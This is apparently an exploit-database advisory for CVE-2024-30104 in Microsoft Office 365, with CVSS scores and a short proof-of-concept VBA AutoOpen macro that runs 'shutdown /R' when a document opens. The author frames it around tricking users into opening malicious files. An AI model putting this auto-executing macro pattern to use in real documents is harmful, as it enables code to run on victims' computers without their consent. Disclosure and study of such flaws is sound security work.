Microsoft Office 265 Remote Code Execution

2024-07-0800:00:00

nu11secur1ty

packetstormsecurity.com

133

microsoft office 365

remote code execution

vulnerability

macro exploit

malicious files

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

Confidence

Low

JSON

`### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)  
  
The problem is still in the "docx" files this vulnerability is a 0 day  
based on the Follina exploit. The Microsoft company still doesn't want  
to understand, that they MUST remove macros options from the 365  
Office and their offline app. In this video, you will see an example  
of this, how some users can be trickery to open the malicious file  
that is sent to them by the attacker. After execution of the file, the  
thing will be very bad for the users who execute it on their computer.  
It depends of the scenario.  
  
### The exploit:  
```vbs  
Sub AutoOpen()  
Dim Program As String  
Dim TaskID As Double  
On Error Resume Next  
Program = "shutdown /R"  
TaskID = Shell(Program, 1)  
If Err <> 0 Then  
MsgBox "Can't start " & Program  
End If  
End Sub  
```  
- Enjoy watching  
  
### PoC:  
[video](https://www.patreon.com/posts/cve-2024-30104-107163015)  
  
`